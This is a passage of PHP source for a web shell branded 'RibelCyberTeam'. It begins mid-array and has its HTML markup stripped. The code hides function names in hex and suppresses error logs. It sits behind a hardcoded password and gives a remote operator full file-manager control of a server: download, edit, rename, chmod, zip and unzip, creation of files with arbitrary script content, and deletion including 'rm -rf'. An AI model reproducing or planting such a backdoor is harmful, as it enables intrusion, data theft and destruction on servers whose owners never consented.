0 '69735f646972', // i s _ d i r => 1 '66696c655f7075745f636f6e74656e7473', // f i l e p u t c o n t e n t s => 2 '69735f66696c65', // i s _ f i l e => 3 '756e6c696e6b', // u n l i n k => 4 '66756E6374696F6E5F657869737473', // f u n c t i o n _ e x i s t s => 5 '6261736536345F656E636F6465', // b a s e 6 4 _ d e c o d e => 6 '676574637764' // g e t c w d => 7 ]; $hitung_array = count($Array); for ($i = 0; $i < $hitung_array; $i++) { $fungsi[] = unhex($Array[$i]); } error_reporting(0); @clearstatcache(); @mb_internal_encoding('UTF-8'); set_time_limit(0); @ini_set('error_log',null); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0); @ini_set('disable_functions', 0); session_start(); date_default_timezone_set("Asia/Jakarta"); $_7 = array_merge($_POST, $_GET); $_r = "required='required'"; $gcw = "getcwd"; $correctPassword = "heker"; //Change Password if (isset($_POST['pass'])) { $enteredPassword = $_POST['pass']; if ($enteredPassword === $correctPassword) { $_SESSION['forbidden'] = true; } else { echo ''; } } if (isset($_GET['logout'])) { session_unset(); session_destroy(); header("Location: ".$_SERVER['PHP_SELF']); exit(); } if (!isset($_SESSION['forbidden'])) { ?> -=[ RibelCyberTeam ]=-
window.location="'.$_SERVER['PHP_SELF'].'";'; } if(isset($_7['opn']) && ($_7['opn'] != '') && ($_7['action'] == 'download')){ @ob_clean(); $file = $_7['opn']; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } function w($dir,$perm) { if(!is_writable($dir)) { return "".$perm.""; } else { return "".$perm.""; } } function s(){ echo '

'; } function ok(){ echo '';} } if($_7['action'] == 'edit') { s(); echo "

: ".basename($file)."
"; } // Rename Folder if($_7['action'] == 'rename_folder') { if($_7['r_d']) { $r_d = rename($dir, "".dirname($dir)."/".htmlspecialchars($_7['r_d']).""); if($r_d) { echo 'Rename folder ok! '.ok().''; }else{ echo 'Rename folder fail! '.er().''; } } s(); echo "

: ".basename($dir)."
"; } if(isset($_7['r_f'])) { $old = $file; $new = $_7['new_name']; rename($new, $old); if(file_exists($new)) { echo ''; }else{ if(rename($old, $new)) { echo 'Rename file ok! '.ok().''; }else{ echo 'Rename file fail! '.er().''; } } } if($_7['action'] == 'rename') { s(); echo "

: ".basename($file)."
"; } // Unzip if ($_7['action'] == 'unzip_file') { s(); if ($_7['yeahx']) { $zipFile = $file; $extractTo = $GLOBALS['fungsi'][7](); $zip = new ZipArchive(); if ($zip->open($zipFile) === true) { $zip->extractTo($extractTo); $zip->close(); echo 'Unzip file ok! ' . ok() . ''; } else { echo 'Unzip file fail! ' . er() . ''; } } echo "

Are you sure to unzip : " . basename($file) . " ?

"; } // Chmod $currentChmod = fileperms($fileToChmod); $currentChmodOctal = substr(sprintf('%o', $currentChmod), -4); if (isset($_POST['cehamot'])) { if (isset($_7['new_chmod'])) { $newChmod = $_7['new_chmod']; $fileToChmod = $file; $newChmodOctal = octdec($newChmod); if (is_numeric($newChmod)) { if (chmod($fileToChmod, $newChmodOctal)) { echo ''; } else { echo ''; } } else { echo ''; } } } if ($_7['action'] == 'chmod') { s(); echo "

: " . basename($file) . "
"; } // Delete File if ($_7['action'] == 'delete_file') { s(); if ($_7['yeahx']) { $delete = $GLOBALS['fungsi'][4]($file); if ($delete) { echo 'Delete file ok! '.ok().''; }else{ echo 'Delete file fail! '.er().''; } } echo "

Are you sure to delete : ".basename($file)." ?

"; } // Delete Folder if ($_7['action'] == 'delete_folder' ) { s(); if ($_7['yeah']) { if($fungsi[1]($dir)) { if(is_writable($dir)) { @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); echo 'Delete folder ok! '.ok().''; } else { echo 'Delete folder fail! '.er().''; } } } echo "

Are you sure to delete : ".basename($dir)." ?

"; } // Zip Folder if ($_7['action'] == 'zip_folder') { s(); if ($_7['yeah']) { $zipFile = $dir . '.zip'; $zip = new ZipArchive(); if ($zip->open($zipFile, ZipArchive::CREATE) === true) { $source = realpath($dir); $zip->addEmptyDir(basename($source)); $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source)); foreach ($iterator as $file) { if ($file->isDir()) { $zip->addEmptyDir($source . '/' . $iterator->getSubPathName()); } else { $zip->addFile($file, $iterator->getSubPathName()); } } $zip->close(); echo 'Zip folder ok! ' . ok() . ''; } else { echo 'Zip folder fail! ' . er() . ''; } } echo "

Are you sure to zip : " . basename($dir) . " ?

"; } // Chmod Folder if ($_7['action'] == 'chmod_folder') { s(); function chmod_folder($dir, $permissions) { if (is_dir($dir)) { if (chmod($dir, octdec($permissions))) { return true; } else { return false; } } else { return false; } } if ($_7['yeah']) { $permissions = $_7['permissions']; if (chmod_folder($dir, $permissions)) { echo 'Chmod folder ok! ' . ok() . ''; } else { echo 'Chmod folder fail! ' . er() . ''; } } echo "

Set permissions for : " . basename($dir) . "

"; } // File New if(isset($_7['filenew'])) { s(); if(isset($_7['bikin'])){ $name = $_7['name_file']; $contents_file = $_7['contents_file']; foreach ($name as $name_file){ $handle = @fopen("$name_file", "w"); if($contents_file){ $create = @fwrite($handle, $contents_file); } else { $create = $handle; } } if($create){ echo ""; } else { echo 'Create file fail! '.er().''; } } echo "
Filename: Your script:
"; } // Dir New if(isset($_7['dirnew'])) { s(); if(isset($_7['create'])){ $name = $_7['name_dir']; foreach ($name as $name_dir){ $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $name_dir); $fd = @mkdir ($folder); } if($fd){ echo ""; } else { echo 'Create dir fail! '.er().''; } } echo "
Name directory:
"; } echo '
'; foreach($scand as $dir){ $dt = date("Y-m-d G:i", filemtime("$path/$dir")); if(strlen($dir) > 50) { $_d = substr($dir, 0, 50)."..."; }else{ $_d = $dir; } if($GLOBALS['fungsi'][5]('posix_getpwuid')) { $downer = @posix_getpwuid(fileowner("$path/$dir")); $downer = $downer['name']; } else { $downer = fileowner("$path/$dir"); } if($GLOBALS['fungsi'][5]('posix_getgrgid')) { $dgrp = @posix_getgrgid(filegroup("$path/$dir")); $dgrp = $dgrp['name']; } else { $dgrp = filegroup("$path/$dir"); } if(!$fungsi[1]($path.'/'.$file)) continue; $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } if(!$fungsi[1]($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo " '; echo " "; } foreach($scand as $file){ $ft = date("Y-m-d G:i", filemtime("$path/$file")); if($GLOBALS['fungsi'][5]('posix_getpwuid')) { $fowner = @posix_getpwuid(fileowner("$path/$file")); $fowner = $fowner['name']; } else { $fowner = fileowner("$path/$file"); } if($GLOBALS['fungsi'][5]('posix_getgrgid')) { $fgrp = @posix_getgrgid(filegroup("$path/$file")); $fgrp = $fgrp['name']; } else { $fgrp = filegroup("$path/$file"); } if(!$fungsi[3]($path.'/'.$file)) continue; if(strlen($file) > 50) { $_f = substr($file, 0, 50)."...-.".$ext; }else{ $_f = $file; } echo " '; echo " "; } ?>
nametype last edit size owner/group permsion action
$_d dir $dt - $downer/$dgrp "; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo p($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '
$_f file $ft ".sz(filesize($file))." $fowner/$fgrp ";if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo p($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '
© Mr.7Mind - RibelCyberTeam